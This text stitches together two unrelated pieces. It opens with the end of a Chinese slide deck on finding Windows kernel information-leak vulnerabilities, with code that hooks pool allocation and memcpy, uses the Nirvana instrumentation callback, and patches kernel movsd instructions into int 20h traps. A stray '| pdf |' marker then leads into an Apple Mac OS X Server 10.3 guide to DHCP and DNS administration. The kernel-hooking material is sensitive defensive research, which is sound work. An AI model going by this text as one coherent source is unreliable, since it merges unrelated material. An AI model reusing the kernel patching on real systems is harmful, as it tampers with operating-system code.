sub ecx, LowLimit;
cld;
rep stosb;
}
栈的污染
在调用ExAllocatePoolWithTag分配内存时,填充特殊标志数据
PVOID NTAPI HOOK_ExAllocatePoolWithTag(...)
{
PVOID Buffer = NULL;
Buffer = pfn_ExAllocatePoolWithTag(PoolType, NumberOfBytes, Tag);
if (Buffer){
memset(Buffer, g_cFlags, NumberOfBytes); //将内存初始化特殊数据,如0xAA
}
return Buffer;
}
堆的污染
堆栈数据污染的思考
•
堆和栈数据污染技术相对简单,并不存在方法优劣
•
内存中可能存在和污染标记相同的数据,有误报的可能性
•
采用随机污染标记减少误报
第2步:数据检测技术研究
目前已经有基于CPU指令模拟、VT等数据检测技术。
那是否还有更简捷的方法呢?
数据检测技术研究
经过探索,我们提出了三种新的用于数据检测技术:
•
Nirvana(首次应用于内核信息泄露漏洞挖掘)
•
memcpy/memmove,后称memcpy(最轻量级的方法)
•
movsd
Nirvana是Microsoft提供的一个轻量级的动态translation框架,可用于监视和控制正在运行的进
程的执行,而无需重新编译或构建进程中的任何代码 (from Hooking Nirvana@Alex
Ionescu),首次被我们应用于内核信息泄露漏洞挖掘。
通过Nirvana可设置系统调用返回到用户态时的回调函数,在回调函数中能够检测栈数据。
ZwSetInformationProcess(NtCurrentProcess(),ProcessInstrumentationCallback,&Info64,size
of(Info64));
typedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION{
ULONG_PTR Version;
ULONG_PTR Reserved;
ULONG_PTR Callback;
}PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;
Nirvana概述
__declspec (naked) VOID InstrumentationCallback()
{
__asm{
//代码有省略...
mov eax, fs:[0x8];
mov edi, fs:[0x4];
cmp dword ptr[eax], g_cFlag; //如0xAAAAAAAA
jz __find;
add eax, 4;
cmp eax, edi;
//代码有省略...
jmp dword ptr fs : [0x1B0];
}
}
Nirvana检测技术的实现
Nirvana捕获到的现场
16
Nirvana检测技术的优点
•
Windows Vista之后系统都支持Nirvana
•
使用系统提供接口,实现非常简单
•
兼容性好
Nirvana检测技术的缺陷
•
只能检测栈数据,几乎无法检测堆数据
•
抓不到泄露现场,分析和编写POC相对困难
memcpy
•
Windows内核层向应用层写入数据一般都使用memcpy/memmove
kernel space
user space
用户态内存
内核态内存
memcpy(dst, src, size);
检测
Hook memcpy/memmove,检测dst是否用户态内存,数据是否包含特殊标志数据
void * __cdecl HOOK_memcpy( void * dst, void * src, size_t count)
{
//代码有省略...
if ((ULONG_PTR)dst < MmUserProbeAddress){
if ((ULONG_PTR)src > MmSystemRangeStart){
pOffset = (PUCHAR)src;
while (pOffset <= (PUCHAR)src + count - sizeof(DWORD)){
if (*(DWORD *)pOffset == g_dwDwordFlags){
//checked
}
}
}
//代码有省略...
}
memcpy检测技术的实现
memcpy检测技术特点
•
实现简单,性能突出几乎没有性能损失
•
兼容性好
•
能够抓到漏洞第一现场,分析和编写POC简单
•
优点突出,几无缺点
memcpy深入研究
•
size为变量,直接调用memcpy
•
size为常数,memcpy被优化
•
size为较大常数,优化为movsd
•
memmove不会被优化
movsd检测方法探索
•
memcpy会被优化成了什么?
•
最终都是编译成movsd指令
•
通过movsd检测数据解决极个别情况下memcpy覆盖面不够
的问题
movsd如何实现检测?
•
movsd dst, src; (F3A5) int 20h; (CD20) 都是两字节
•
扫描nt模块代码段,替换所有movsd为int 20h
•
自定义int 20h中断处理函数,KiTrap20
•
KiTrap20中检测内存数据
if (*(WORD *)pOffset == 0xA5F3){ //rep movs dword ptr es:[edi],dword ptr [esi]
MdlBuffer = GetMdlBuffer(&Mdl, pOffset, 2);
*(WORD *)MdlBuffer = 0x20CD;//int 20
}
__declspec (naked) VOID HOOK_KiTrap20()
{
__asm {
//代码有省略...
pushfd;
pushad;
call DetectMemory;
popad;
popfd;
rep movs dword ptr es:[edi], dword ptr[esi];//也可以检测类似指令
iretd; }
//代码有省略...
}
movsd检测技术的实现
VOID
DetectMemory(PVOID DestAddress, PVOID SrcAddress, SIZE_T Size)
{
//代码有省略...
if ((ULONG_PTR)DestAddress < MmUserProbeAddress){
pOffset = (PUCHAR)SrcAddress;
if (*(ULONG_PTR *)pOffset == g_dwDwordFlags){
//checked
}
//代码有省略...
}
}
movsd检测技术的实现
movsd检测技术特点
•
检测数据较memcpy覆盖更全面
•
能够抓到漏洞第一现场,分析和编写POC简单
第3步:漏洞分析
•
捕获到疑似漏洞时,通过调试器现场分析确认
•
让代码执行回到用户态,确认用户态内存中是否存在特殊标志数据,
如果存在那么就是内核信息泄露漏洞
•
通过分析调用栈和逆向用户态的系统调用的相关代码,编写POC
漏洞分析
•
有些漏洞内存经过多次拷贝,造成分析和编写POC非常困难
•
我们专门实现了一套内存追踪的工具来辅助分析,支持:
•
内存trace
•
内存条件断点
这是win10 17134 x64检测到的一个漏洞现场,该漏洞已分配CVE-2018-8443
CVE实例分析
回溯到mpssvc.dll,确认用户态内存是否包含特殊标记
CVE实例分析
回溯到mpssvc.dll,找到漏洞触发代码
CVE实例分析
CVE实例分析
最终完成poc
CVE实例分析
使用三个月就已挖掘windows内核信息泄露漏洞12个,都已分配CVE
其中7个CVE获得当时最高5000$奖金
成果
思考
•
仅此而已吗…
•
用户态内存只读(去掉PTE写位)
•
反向追踪
•
…
?
Thank you
Tanghui Chen
[email protected] | pdf |
Mac OS X Server
Network Services
Administration
For Version 10.3 or Later
034-2351_Cvr 9/12/03 10:26 AM Page 1
Apple Computer, Inc.
© 2003 Apple Computer, Inc. All rights reserved.
The owner or authorized user of a valid copy of Mac OS
X Server software may reproduce this publication for the
purpose of learning to use such software. No part of this
publication may be reproduced or transmitted for
commercial purposes, such as selling copies of this
publication or for providing paid for support services.
Use of the “keyboard” Apple logo (Option-Shift-K) for
commercial purposes without the prior written consent
of Apple may constitute trademark infringement and
unfair competition in violation of federal and state laws.
Apple, the Apple logo, AirPort, AppleScript, AppleShare,
AppleTalk, Mac, Mac OS, Macintosh, Power Mac, Power
Macintosh, QuickTime, Sherlock, and WebObjects are
trademarks of Apple Computer, Inc., registered in the
U.S. and other countries.
Adobe and PostScript are trademarks of Adobe Systems
Incorporated.
Java and all Java-based trademarks and logos are
trademarks or registered trademarks of Sun
Microsystems, Inc. in the U.S. and other countries.
UNIX is a registered trademark in the United States and
other countries, licensed exclusively through
X/Open Company, Ltd.
034-2351/9-20-03
LL2351.Book Page 2 Monday, September 8, 2003 2:47 PM
3
1
Contents
Preface
5
How to Use This Guide
5
What’s Included in This Guide
5
Using This Guide
6
Setting Up Mac OS X Server for the First Time
6
Getting Help for Everyday Management Tasks
6
Getting Additional Information
Chapter 1
7
DHCP Service
7
Before You Set Up DHCP Service
9
Setting Up DHCP Service for the First Time
10
Managing DHCP Service
14
Monitoring DHCP Service
16
Where to Find More Information
Chapter 2
17
DNS Service
18
Before You Set Up DNS Service
18
Setting Up DNS Service for the First Time
21
Managing DNS Service
22
Managing Zones
25
Managing Records
28
Monitoring DNS
30
Securing the DNS Server
33
Common Network Administration Tasks That Use DNS Service
37
Configuring BIND Using the Command Line
41
Where to Find More Information
Chapter 3
43
IP Firewall Service
45
Understanding Firewall Filters
48
Setting Up Firewall Service for the First Time
49
Managing Firewall Service
55
Monitoring Firewall Service
57
Practical Examples
59
Common Network Administration Tasks That Use Firewall Service
60
Advanced Configuration
LL2351.Book Page 3 Monday, September 8, 2003 2:47 PM
4
Contents
63
Port Reference
66
Where to Find More Information
Chapter 4
67
NAT Service
67
Starting and Stopping NAT Service
68
Configuring NAT Service
68
Monitoring NAT Service
69
Where to Find More Information
Chapter 5
71
VPN Service
72
VPN and Security
73
Before You Set Up VPN Service
73
Managing VPN Service
76
Monitoring VPN Service
77
Where to Find More Information
Chapter 6
79
NTP Service
79
How NTP Works
80
Using NTP on Your Network
80
Setting Up NTP Service
81
Configuring NTP on Clients
81
Where to Find More Information
Chapter 7
83
IPv6 Support
84
IPv6 Enabled Services
84
IPv6 Addresses in the Server Admin
84
IPv6 Addresses
86
Where to Find More Information
Glossary
87
Index
95
LL2351.Book Page 4 Monday, September 8, 2003 2:47 PM
5
Preface
How to Use This Guide
What’s Included in This Guide
This guide consists primarily of chapters that tell you how to administer various
Mac OS X Server network services:
•
DHCP
•
DNS
•
IP Firewall
•
NAT
•
VPN
•
NTP
•
IPv6 Support
Using This Guide
Each chapter covers a specific network service. Read any chapter that’s about a service
you plan to provide to your users. Learn how the service works, what it can do for you,
strategies for using it, how to set it up for the first time, and how to administer it over
time.
Also take a look at chapters that describe services with which you’re unfamiliar. You
may find that some of the services you haven’t used before can help you run your
network more efficiently and improve performance for your users.
Most chapters end with a section called “Where to Find More Information.” This section
points you to websites and other reference material containing more information
about the service.
LL2351.Book Page 5 Monday, September 8, 2003 2:47 PM
6
Preface
How to Use This Guide
Setting Up Mac OS X Server for the First Time
If you haven’t installed and set up Mac OS X Server, do so now.
•
Refer to
Mac OS X Server Getting Started for Version 10.3 or Later,
the document that
came with your software, for instructions on server installation and setup. For many
environments, this document provides all the information you need to get your
server up, running, and available for initial use.
•
Review this guide to determine which services you’d like to refine and expand, to
identify new services you’d like to set up, and to learn about the server applications
you’ll use during these activities.
•
Read specific chapters to learn how to continue setting up individual services. Pay
particular attention to the information in these sections: “Setup Overview,” “Before
You Begin,” and “Setting Up for the First Time.”
Getting Help for Everyday Management Tasks
If you want to change settings, monitor services, view service logs, or do any other day-
to-day administration task, you can find step-by-step procedures by using the on-
screen help available with server administration programs. While all the network
services’ administration tasks are also documented in the network services
administration guide, sometimes it’s more convenient to retrieve information in
onscreen help form while using your server.
Getting Additional Information
In addition to this document, you’ll find information about Mac OS X Server:
•
In
Mac OS X Server Getting Started for Version 10.3 or Later,
which tells you how to
install and set up your server initially.
•
At www.apple.com/server.
•
In onscreen help on your server.
•
In Read Me files on your server CD.
LL2351.Book Page 6 Monday, September 8, 2003 2:47 PM
1
7
1
DHCP Service
Dynamic Host Configuration Protocol (DHCP) service lets you administer and distribute
IP addresses to client computers from your server. When you configure the DHCP
server, you assign a block of IP addresses that can be made available to clients. Each
time a client computer configured to use DHCP starts up, it looks for a DHCP server on
your network. If a DHCP server is found, the client computer then requests an IP
address. The DHCP server checks for an available IP address and sends it to the client
computer along with a “lease period” (the length of time the client computer can use
the address) and configuration information.
You can use the DHCP module in Server Admin to:
•
Configure and administer DHCP service.
•
Create and administer subnets.
•
Configure DNS, LDAP, and WINS options for client computers.
•
View DHCP address leases.
If your organization has more clients than IP addresses, you’ll benefit from using DHCP
service. IP addresses are assigned on an as-needed basis, and when they’re not needed,
they’re available for use by other clients. You can use a combination of static and
dynamic IP addresses for your network if you need to. Read the next section for more
information about static and dynamic allocation of IP addresses.
Organizations may benefit from the features of DHCP service, such as the ability to set
Domain Name System (DNS) and Lightweight Directory Access Protocol (LDAP) options
for client computers without additional client configuration.
Before You Set Up DHCP Service
Before you set up DHCP service, read this section for information about creating
subnets, assigning static and dynamic IP addresses, locating your server on the
network, and avoiding reserved IP addresses.
LL2351.Book Page 7 Monday, September 8, 2003 2:47 PM
8
Chapter 1
DHCP Service
Creating Subnets
Subnets are groupings of computers on the same network that simplify administration.
You can organize subnets any way that is useful to you. For example, you can create
subnets for different groups within your organization or for different floors of a
building. Once you have grouped client computers into subnets, you can configure
options for all the computers in a subnet at one time instead of setting options for
individual client computers. Each subnet needs a way to connect to the other subnets.
A hardware device called a
router
typically connects subnets.
Assigning IP Addresses Dynamically
With dynamic allocation, an IP address is assigned for a limited period of time (the
lease
time
) or until the client computer doesn’t need the IP address, whichever comes first. By
using short leases, DHCP can reassign IP addresses on networks that have more
computers than available IP addresses.
Addresses allocated to Virtual Private Network (VPN) clients are distributed much like
DHCP addresses, but they don’t come out of the same range of addresses as DHCP. If
you plan on using VPN, be sure to leave some addresses unallocated by DHCP for use
by VPN. To learn more about VPN, see Chapter 5, “VPN Service,” on page 71.
Using Static IP Addresses
Static IP addresses are assigned to a computer or device once and then don’t change.
You may want to assign static IP addresses to computers that must have a continuous
Internet presence, such as web servers. Other devices that must be continuously
available to network users, such as printers, may also benefit from static IP addresses.
Static IP addresses must be set up manually by entering the IP address on the
computer or device that is assigned the address. Manually configured static IP
addresses avoid possible issues certain services may have with DHCP-assigned
addresses and avoid the delay required for DHCP to assign an address.
Don’t include Static IP address ranges in the range distributed by DHCP.
Locating the DHCP Server
When a client computer looks for a DHCP server, it broadcasts a message. If your DHCP
server is on a different subnet from the client computer, you must make sure the
routers that connect your subnets can forward the client broadcasts and the DHCP
server responses. A relay agent or router on your network that can relay BootP
communications will work for DHCP. If you don’t have a means to relay BootP
communications, you must place the DHCP server on the same subnet as your client.
LL2351.Book Page 8 Monday, September 8, 2003 2:47 PM
Chapter 1
DHCP Service
9
Interacting With Other DHCP Servers
You may already have other DHCP servers on your network, such as AirPort Base
Stations. Mac OS X Server can coexist with other DHCP servers as long as each DHCP
server uses a unique pool of IP addresses. However, you may want your DHCP server to
provide an LDAP server address for client auto-configuration in managed
environments. AirPort Base Stations can’t provide an LDAP server address. Therefore, if
you want to use the auto-configuration feature, you must set up AirPort Base Stations
in Ethernet-bridging mode and have Mac OS X Server provide DHCP service. If the
AirPort Base Stations are on separate subnets, then your routers must be configured to
forward client broadcasts and DHCP server responses as described previously. If you
wish to provide DHCP service with AirPort Base Stations then you can’t use the client
auto-configuration feature and you must manually enter LDAP server addresses at
client workstations.
Using Multiple DHCP Servers on a Network
You can have multiple DHCP servers on the same network. However, it’s important that
they’re configured properly as to not interfere with each other. Each server needs a
unique pool of IP addresses to distribute.
Assigning Reserved IP Addresses
Certain IP addresses can’t be assigned to individual hosts. These include addresses
reserved for loopback and addresses reserved for broadcasting. Your ISP won’t assign
such addresses to you. If you try to configure DHCP to use such addresses, you’ll be
warned that the addresses are invalid, and you’ll need to enter valid addresses.
Getting More Information on the DHCP Process
Mac OS X Server uses a daemon process called “bootpd” that is responsible for the
DHCP Service’s address allocation. You can learn more about bootpd and its advanced
configuration options by accessing its man page using the Terminal utility.
Setting Up DHCP Service for the First Time
If you used the Setup Assistant to configure ports on your server when you installed
Mac OS X Server, some DHCP information is already configured. You need to follow the
steps in this section to finish configuring DHCP service. You can find more information
about settings for each step in “Managing DHCP Service” on page 10.
Step 1: Create subnets
The following instructions show you how to create a pool of IP addresses that are
shared by the client computers on your network. You create one range of shared
addresses per subnet. These addresses are assigned by the DHCP server when a client
issues a request.
See “Creating Subnets in DHCP Service” on page 10.
LL2351.Book Page 9 Monday, September 8, 2003 2:47 PM
10
Chapter 1
DHCP Service
Step 2: Set up logs for DHCP service
You can log DHCP activity and errors to help you monitor requests and identify
problems with your server.
DHCP service records diagnostic messages in the system log file. To keep this file from
growing too large, you can suppress most messages by changing your log settings in
the Logging pane of the DHCP service settings. For more information on setting up
logs for DHCP service, see “Setting the Log Detail Level for DHCP Service” on page 15.
Step 3: Start DHCP service
See “Starting and Stopping DHCP Service” on page 10.
Managing DHCP Service
This section describes how to set up and manage DHCP service on Mac OS X Server. It
includes starting service, creating subnets, and setting optional settings like LDAP or
DNS for a subnet.
Starting and Stopping DHCP Service
Follow these steps when starting or stopping DHCP. You must have at least one subnet
created and enabled.
To start or stop DHCP service:
1
In Server Admin, choose DHCP from the Computers & Services list.
2
Make sure at least one subnet and network interface is configured and selected.
3
Click Start Service or Stop Service.
When the service is turned on, the Stop Service button is available.
Creating Subnets in DHCP Service
Subnets are groupings of client computers on the same network that may be
organized by location (different floors of a building, for example) or by usage (all
eighth-grade students, for example). Each subnet has at least one range of IP addresses
assigned to it.
To create a new subnet:
1
In Server Admin, choose DHCP from the Computers & Services list.
2
Click Settings.
3
Select the Subnets tab.
4
Click Add, or double-click an existing subnet.
5
Select the General tab.
6
Enter a descriptive name for the new subnet. (Optional)
LL2351.Book Page 10 Monday, September 8, 2003 2:47 PM
Chapter 1 DHCP Service
11
7 Enter a starting and ending IP address for this subnet range.
Addresses must be contiguous, and they can’t overlap with other subnets’ ranges.
8 Enter the subnet mask for the network address range.
9 Choose the Network Interface from the pop-up menu.
10 Enter the IP address of the router for this subnet.
If the server you’re configuring now is the router for the subnet, enter this server’s
internal LAN IP address as the router’s address.
11 Define a lease time in hours, days, weeks, or months.
12 If you wish to set DNS, LDAP, or WINS information for this subnet, enter these now.
See “Setting the DNS Server for a DHCP Subnet” on page 12, “Setting LDAP Options for
a Subnet” on page 13, and “Setting WINS Options for a Subnet” on page 13 for more
information.
13 Click Save.
Changing Subnet Settings in DHCP Service
Use Server Admin to make changes to existing DHCP subnet settings. You can change
IP address range, subnet mask, network interface, router, or lease time.
To change subnet settings:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet.
5 Click Edit.
6 Make the changes you want.
These changes can include adding DNS, LDAP, or WINS information. You can also
redefine address ranges or redirect the network interface that responds to DHCP
requests.
7 Click Save.
LL2351.Book Page 11 Monday, September 8, 2003 2:47 PM
12
Chapter 1 DHCP Service
Deleting Subnets From DHCP Service
You can delete subnets and subnet IP address ranges when they will no longer be
distributed to clients.
To delete subnets or address ranges:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select a subnet.
4 Click Delete.
5 Click Save to confirm the deletion.
Changing IP Address Lease Times for a Subnet
You can change how long IP addresses in a subnet are available to client computers.
To change the lease time for a subnet address range:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet range and click Edit.
5 Select the General tab.
6 Select a time scale from the Lease Time pop-up menu (hours, days, weeks, or months).
7 Enter a number in the Lease Time field.
8 Click Save.
Setting the DNS Server for a DHCP Subnet
You can decide which DNS servers and default domain name a subnet should use.
DHCP service provides this information to the client computers in the subnet.
To set DNS options for a subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet and click Edit.
5 Select the DNS tab.
6 Enter the default domain of the subnet.
7 Enter the primary and secondary name server IP addresses you want DHCP clients to
use.
8 Click Save.
LL2351.Book Page 12 Monday, September 8, 2003 2:47 PM
Chapter 1 DHCP Service
13
Setting LDAP Options for a Subnet
You can use DHCP to provide your clients with LDAP server information rather than
manually configuring each client’s LDAP information. The order in which the LDAP
servers appear in the list determines their search order in the automatic Open Directory
search policy.
If you have are using this Mac OS X Server as an LDAP master, the LDAP options will be
pre-populated with the necessary configuration information. If your LDAP master
server is another machine, you’ll need to know the domain name or IP address of the
LDAP database you want to use. You also will need to know the LDAP search base.
To set LDAP options for a subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet and click Edit.
5 Click the LDAP tab.
6 Enter the domain name or IP address of the LDAP server for this subnet.
7 Enter the search base for LDAP searches.
8 Enter the LDAP port number, if you’re using a non-standard port.
9 Select LDAP over SSL, if necessary.
10 Click Save.
Setting WINS Options for a Subnet
You can give additional information to client computers running Windows in a subnet
by adding the Windows-specific settings to the DHCP supplied network configuration
data. These Windows-specific settings allow Windows clients to browse their Network
Neighborhood.
You must know the domain name or IP address of the WINS/NBNS primary and
secondary servers (this is usually the IP address of the DHCP server itself), and the NBT
node type (which is usually “broadcast”). The NBDD Server and the NetBIOS Scope ID
are typically not used, but you may need to use them, depending on your Windows
clients’ configuration, and Windows network infrastructure.
LL2351.Book Page 13 Monday, September 8, 2003 2:47 PM
14
Chapter 1 DHCP Service
To set WINS options for a subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Select a subnet and click Edit.
5 Click the WINS tab.
6 Enter the domain name or IP address of the WINS/NBNS primary and secondary servers
for this subnet.
7 Enter the domain name or IP address of the NBDD server for this subnet.
8 Choose the NBT node type from the pop-up menu.
9 Enter the NetBIOS Scope ID.
10 Click Save.
Disabling Subnets Temporarily
You can temporarily shut down a subnet without losing all its settings. This means no
IP addresses from the subnet’s range will be distributed on the selected interface to
any client.
To disable a subnet:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Subnets tab.
4 Deselect “Enable” next to the subnet you want to disable.
Monitoring DHCP Service
You’ll need to monitor DHCP service. There are two main ways to monitor DHCP
service. First, you can view the client list; second, you can monitor the log files
generated by the service. You can use the service logs to help troubleshoot network
problems. The following sections discuss these aspects of monitoring DHCP service.
Viewing the DHCP Status Overview
The status overview shows a simple summary of the DHCP service. It shows whether or
not the service is running, how many clients it has, and when service was started. It
also shows how many IP addresses are statically assigned from your subnets and the
last time the client database was updated.
To see the overview:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click the Overview button.
LL2351.Book Page 14 Monday, September 8, 2003 2:47 PM
Chapter 1 DHCP Service
15
Setting the Log Detail Level for DHCP Service
You can choose the level of detail you want to log for DHCP service.
• “Low (errors only)” will indicate conditions for which you need to take immediate
action (for example, if the DHCP server can’t start up). This level corresponds to
bootpd reporting in “quiet” mode, with the “-q” flag.
• “Medium (errors and warnings)” can alert you to conditions in which data is
inconsistent, but the DHCP server is still able to operate. This level corresponds to
default bootpd reporting.
• “High (all events)” will record all activity by the DHCP service, including routine
functions. This level corresponds to bootpd reporting in “verbose” mode, with the “-v”
flag.
To set up the log detail level:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Choose the logging option you want.
5 Click Save.
Viewing DHCP Log Entries
If you’ve enabled logging for DHCP service, you can check the system log for DHCP
errors.
To see DHCP log entries:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Log.
Viewing the DHCP Client List
The DHCP Clients window gives the following information for each client:
• The IP address served to the client.
• The number of days of lease time left, until the time is less than 24 hours; then the
number of hours and minutes.
• The DHCP client ID. This is usually, but not always, the same as the hardware address.
• The computer name.
• The Ethernet ID.
To view the DHCP client list:
1 In Server Admin, choose DHCP from the Computers & Services list.
2 Click Clients.
Click any column heading to sort the list by different criteria.
LL2351.Book Page 15 Monday, September 8, 2003 2:47 PM
16
Chapter 1 DHCP Service
Where to Find More Information
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at www.faqs.org/rfcs.
For details about DHCP, see RFC 2131.
For more information on bootpd and its advanced configuration options, see bootpd’s
man page.
LL2351.Book Page 16 Monday, September 8, 2003 2:47 PM
2
17
2 DNS Service
When your clients want to connect to a network resource such as a web or file server,
they typically request it by its domain name (such as www.example.com) rather than
by its IP address (such as 192.168.12.12). The Domain Name System (DNS) is a distributed
database that maps IP addresses to domain names so your clients can find the
resources by name rather than by numerical address.
A DNS server keeps a list of domain names and the IP addresses associated with each
name. When a computer needs to find the IP address for a name, it sends a message to
the DNS server (also known as a name server). The name server looks up the IP address
and sends it back to the computer. If the name server doesn’t have the IP address
locally, it sends messages to other name servers on the Internet until the IP address is
found.
Setting up and maintaining a DNS server is a complex process. Therefore many
administrators rely on their Internet Service Provider (ISP) for DNS services. In this case,
you only have to configure your network preferences with the name server IP address
provided by your ISP.
If you don’t have an ISP to handle DNS requests for your network and any of the
following is true, you need to set up DNS service:
• You don’t have the option to use DNS from your ISP or other source.
• You plan on making frequent changes to the namespace and want to maintain it
yourself.
• You have a mail server on your network and you have difficulties coordinating with
the ISP that maintains your domain.
Mac OS X Server uses Berkeley Internet Name Domain (BIND v.9.2.2) for its
implementation of DNS protocols. BIND is an open-source implementation and is used
by the majority of name servers on the Internet.
LL2351.Book Page 17 Monday, September 8, 2003 2:47 PM
18
Chapter 2 DNS Service
Before You Set Up DNS Service
This section contains information you should consider before setting up DNS on your
network. The issues involved with DNS administration are complex and numerous. You
should only set up DNS service on your network if you’re an experienced DNS
administrator.
You should consider creating a mail account called “hostmaster” that receives mail and
delivers it to the person that runs the DNS server at your site. This allows users and
other DNS administrators to contact you regarding DNS problems.
DNS and BIND
You should have a thorough understanding of DNS before you attempt to set up your
own DNS server. A good source of information about DNS is DNS and BIND, 4th edition,
by Paul Albitz and Cricket Liu (O’Reilly and Associates, 2001).
Note: Apple can help you locate a network consultant to implement your DNS service.
You can contact Apple Professional Services and Apple Consultants Network on the
web at www.apple.com/services/ or www.apple.com/consultants.
Setting Up Multiple Name Servers
You should set up at least one primary and one secondary name server. That way, if the
primary name server unexpectedly shuts down, the secondary name server can
continue to provide service to your users. A secondary server gets its information from
the primary server by periodically copying all the domain information from the primary
server.
Once a name server learns a name/address pair of a host in another domain (outside
the domain it serves), the information is cached, which ensures that IP addresses for
recently resolved names are stored for later use. DNS information is usually cached on
your name server for a set time, referred to as a time-to-live (TTL) value. When the TTL
for a domain name/IP address pair has expired, the entry is deleted from the name
server’s cache and your server will request the information again as needed.
Setting Up DNS Service for the First Time
If you’re using an external DNS name server and you entered its IP address in the Setup
Assistant, you don’t need to do anything else. If you’re setting up your own DNS server,
follow the steps in this section.
Step 1: Register your domain name
Domain name registration is managed by a central organization, the Internet Assigned
Numbers Authority (IANA). IANA registration makes sure domain names are unique
across the Internet. (See www.iana.org for more information.) If you don’t register your
domain name, your network won’t be able to communicate over the Internet.
LL2351.Book Page 18 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
19
Once you register a domain name, you can create subdomains within it as long as you
set up a DNS server on your network to keep track of the subdomain names and IP
addresses.
For example, if you register the domain name “example.com,” you could create
subdomains such as “host1.example.com,” “mail.example.com,” or “www.example.com.”
A server in a subdomain could be named “primary.www.example.com,” or
“backup.www.example.com.” The DNS server for example.com keeps track of
information for its subdomains, such as host (or computer) names, static IP addresses,
aliases, and mail exchangers. If your ISP handles your DNS service, you’ll need to inform
them of any changes you make to your namespace, including adding subdomains.
The range of IP addresses for use with a given domain must be clearly defined before
setup. These addresses are used exclusively for one specific domain (never by another
domain or subdomain). The range of addresses should be coordinated with your
network administrator or ISP.
Step 2: Learn and plan
If you’re new to working with DNS, learn and understand DNS concepts, tools, and
features of Mac OS X Server and BIND. See “Where to Find More Information” on
page 41.
Then plan your Domain Name System Service. You may consider the following
questions when planning:
• Do you even need a local DNS server? Does your ISP provide DNS service? Could you
use Rendezvous names instead?
• How many servers will you need for anticipated load? How many servers will you
need for backup purposes? For example, you should designate a second or even
third computer for backup DNS service.
• What is your security strategy to deal with unauthorized use?
• How often should you schedule periodic inspections or tests of the DNS records to
verify data integrity?
• How many services or devices (like an intranet website or a network printer) are
there that will need a name?
• What method should you use to configure DNS?
There are two ways to configure DNS service on Mac OS X Server. First, and
recommended, you can use Server Admin to set up DNS service. For more information,
see “Managing DNS Service” on page 21 for instructions.
The second way to configure DNS is by editing the BIND configuration file. BIND is the
set of programs used by Mac OS X Server that implements DNS. One of those programs
is the name daemon, or named. To set up and configure BIND, you need to modify the
configuration file and the zone file.
LL2351.Book Page 19 Monday, September 8, 2003 2:47 PM
20
Chapter 2 DNS Service
The configuration file is located in this file:
/etc/named.conf
The zone file name is based on the name of the zone. For example, the zone file
“example.com” is located in this file:
/var/named/example.com.zone
See “Configuring BIND Using the Command Line” on page 37 for more information.
Step 3: Configure basic DNS settings
See “Managing DNS Service” on page 21 for more information.
Step 4: Create a DNS Zone
Use Server Admin to set up DNS zones. See “Managing Zones” on page 22 for
instructions. After adding a master zone, Server Admin automatically creates an NS
record with the same name as the Source of Authority (SOA).
Step 5: Add Address and additional records to the zone.
Use Server Admin to add additional records to your Zone. Create an Address record for
every computer or device (printer, file server, etc.) that has a static IP address and needs
a name. When you create an A record, you have the option to specify the creation of a
reverse lookup record and it’s corresponding zone. See “Managing Records” on page 25
for instructions.
Step 6: Set up a mail exchange (MX) record (optional)
If you provide mail service over the Internet, you need to set up an MX record for your
server. See “Setting Up MX Records” on page 33 for more information.
Step 7: Configure the reverse lookup zone (optional)
For each zone that you create, Mac OS X Server creates a reverse lookup zone. Reverse
lookup zones translate IP addresses to domain names, rather than normal lookups
which translate domain names to IP addresses. If you have not specified reverse lookup
records when initially creating your A records, you might need to configure your
reverse lookup zone after its creation.
Step 8: Start DNS service
Mac OS X Server includes a simple interface for starting and stopping DNS service.
See “Starting and Stopping DNS Service” on page 21 for more information.
LL2351.Book Page 20 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
21
Managing DNS Service
Mac OS X Server provides a simple interface for starting and stopping DNS service as
well as viewing logs and status. Basic DNS settings can be configured with Server
Admin. More advanced features require configuring BIND from the command-line, and
are not covered here.
Starting and Stopping DNS Service
Use this procedure to start or stop DNS service. Remember to restart the DNS service
whenever you make changes to the DNS service in Server Admin.
To start or stop DNS service:
1 In Server Admin, choose DNS from the Computers & Services list.
2 Make sure you have at least one Zone and its reverse lookup zone created and fully
configured.
3 Click Start Service or Stop Service.
The service may take a moment to start (or stop).
Enabling or Disabling Zone Transfers
In the Domain Name System, zone data is replicated among authoritative DNS servers
by means of the “zone transfer.” Secondary DNS servers (“slaves”) use zone transfers to
acquire their data from primary DNS servers (“masters”). Zone transfers must be
enabled to use secondary DNS servers.
To enable or disable zone transfer:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the General tab.
4 Select or deselect Allow Zone Transfers as needed.
Enabling or Disabling Recursion
Recursion is a process to fully resolve domain names into IP addresses. Users’
applications depend on the DNS server to perform this function. Other DNS servers
that query yours don’t have to perform the recursion.
To prevent malicious users from altering the master zone’s records (“cache poisoning”),
or allowing unauthorized use of the server for DNS service, you can disable recursion.
However, if you stop it, your own users won’t be able to use your DNS service to look
up any names outside of your zones.
You should only disable recursion if no clients are using this DNS server for name
resolution and no servers are using it for forwarding.
LL2351.Book Page 21 Monday, September 8, 2003 2:47 PM
22
Chapter 2 DNS Service
To enable or disable recursion:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the General tab.
